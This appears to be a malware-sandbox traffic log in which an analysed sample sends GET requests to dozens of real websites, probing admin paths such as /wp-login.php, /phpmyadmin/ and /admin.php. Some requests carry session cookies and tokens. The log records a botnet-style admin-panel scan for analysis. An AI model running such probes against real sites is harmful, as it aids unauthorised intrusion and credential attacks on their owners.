Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=tsjerc0qbgetoevok3cpga3dv1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://talentius.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin.php HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.integraledu.hrAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipCookie: CMSSESSID80f9fd3f=n9r0q6tfn1hneshgldk0v63lt6User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.bunasta.eu/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.harasduberry.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=ggr72avlfjvqinhaol7mprbv57User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://getquipu.com/
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/pages/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://esoft.academy/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=4f36ac64dc73c26adfab9dad01788b38|11f187638643e13d7bd1963991fac52b; OF=9lma3oral9i39bi8q8vm70o157User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6InRCT085QUZJRjFua2xuMDJDT3JmbHc9PSIsInZhbHVlIjoiM3VwZ1JLbGxsM1JCcFR0U1RHbFZ4Wmk1OXNLN2ZLZ1BCa3Ezemo4Q2JnaFc1SnJ5OGt0ajUyRFpXc1ZlZkgyc002aEdTcWVIeldKVEdTT3hrZEhyQkxnOW45M3BxbHFoZFJTVlA2MHRkQUdud1RoM3hFc2R1TllxRE1DbWFQc0YiLCJtYWMiOiIzYzAwYjY4YWEyNjk2YTU4NDZjYmJlN2ZkOWEwNjQxMTY5YTVkYTg2NzA4MDhlNWNkZDQwMTRhYjMwNDhlN2IyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6ImdiYkFhd05JR2E4T1V1QzU0RmJ0R1E9PSIsInZhbHVlIjoiZ1dZODltbm1WZkZRajlLRjFpVVV6VXBiZWtJdWlpWitLRXd6V09BMHMvcHh0Si9LRG81QjBGelNBRnlLTDZPcHdaMTZqV0hldnFXZ2pWTEZPOTlzRC9maFJOMk5WQmNhNjlabTVCTktsVzYrdWpJb000SmhCMU16Z0hUQ1o3RXkiLCJtYWMiOiJhMTMzN2U5N2RhYjc0MmQwNmQyYjhjZWYzZGQ2ZGZjNWJhZDM0OWFiODU1MTFmZjYyYjA4ZmI1ZmE0NDI5YTkzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJZU3NLbzFKdGUxMkI3Nm1jTjNaREE9PSIsInZhbHVlIjoidlEwV0taUnFVb1JOeXVHM2V6bXNaM3pEeWJSejdRUEE4R0cxcTYzZjVBYXYxVCs2elVaMW9MUFhESGVRa3RDQlY1R0lSVlA1bFJBWWJPRDNkaTBrRGl2amlDc0NoVFlpUjEvc25HeHFEaXc2N2ZrUk5DTmNteTFqZ3JWMnVaRDgiLCJtYWMiOiI2NTc0MTQyNjdkYzE4YWYwOTU3NDk3YzVjMTdlOWRkYmQ3MjMxMDBjNGUwMGVhMGRiN2U0Yzc5YTM5OTQ5YjI2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6ImU4M05CeFdURWNUc0ZzQ2dqN1lFT3c9PSIsInZhbHVlIjoiaVhaYitWU0NGcUtJbFVXbHZDeTFZb3BvdXh5Y1dVajl2VDJEaXYrR29OVlJuWmVDUnB1SkZEVGN4NFVIak5CekRjdXdzVkd3R25zSWZXcVo5akRja0hsWDhNbzVCSGYwalk4QmxQWENlYzJQdDZLUGRIVm5QNTBhYiszNXkxTGkiLCJtYWMiOiJmOTVmY2Y3NzZjN2M0NTRkNGMxNDdmYWYxZjI1YzVlM2QxZmZlMDgwMmMzOGYzNjg4ZTE5YjNlZTMxNGI4MTQ2IiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InF3ZngrWVg5clBjRjFERUZvRVFCREE9PSIsInZhbHVlIjoiQjFQMzd6RTJFS0ovK2VYVVhaaUFWQjQxODRsWXA0RkZxUGZEWEhBZWFMK0tUTHNoZkVjQUJ5OE1BVHlPTThRbFlIaXNVL1JtRFllb2l3R0tLdURtZUkrVWIxL1AvR0hqdmRBWGNHSlFFWng1NzlTRmZ6QWFzZVFFRUdmalNieWgiLCJtYWMiOiJhYWJjOWRjYWY4NDFhNjhkMDY5MzM0YzQ1NTIxMTNhMGRjZDZkMmUxZTRkYzBlZGNmMDFhMjFhODk3Y2I3YjIzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6Im5paEdlSlh3eDllRmZqM2VhVG5XbGc9PSIsInZhbHVlIjoiaTd1VWNrcEdXenVERFhjUEtQVFdzekd3a1ptYkZ3RE5lZ0NQdmtuYmE3U0pGZmVGNERmRWI2TzJWQnQvelArMUM5TEI1bHZSNnZHMGhuVkZseFd3am9ZSFNFNzQrbGRKSTNYeUV6VVJ2bUhHalFJY1lyWXRpK0lRQjdwZFlEdnUiLCJtYWMiOiI0NjM2ZjFlNjMzMDEyMDdhOGY0NTNmZTMyODdmMDhkZDk3NDBlZDMwMGQxNTI2Nzk2YTBiMDIxYzM0OWM0NGI2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gccb.co.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /login/?page=%2Fphpmyadmin%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=m8r73sfk2fugohr6q21ktgilm1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=m4dctrurspuesp0b7frt4pped2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipCookie: CMSSESSID80f9fd3f=n9r0q6tfn1hneshgldk0v63lt6User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.bunasta.eu/administrator/
Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=LBk7ek8JijCF4DUXGuPIp.xw2i6pFPf2iviA637QaLY-1700978381416-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
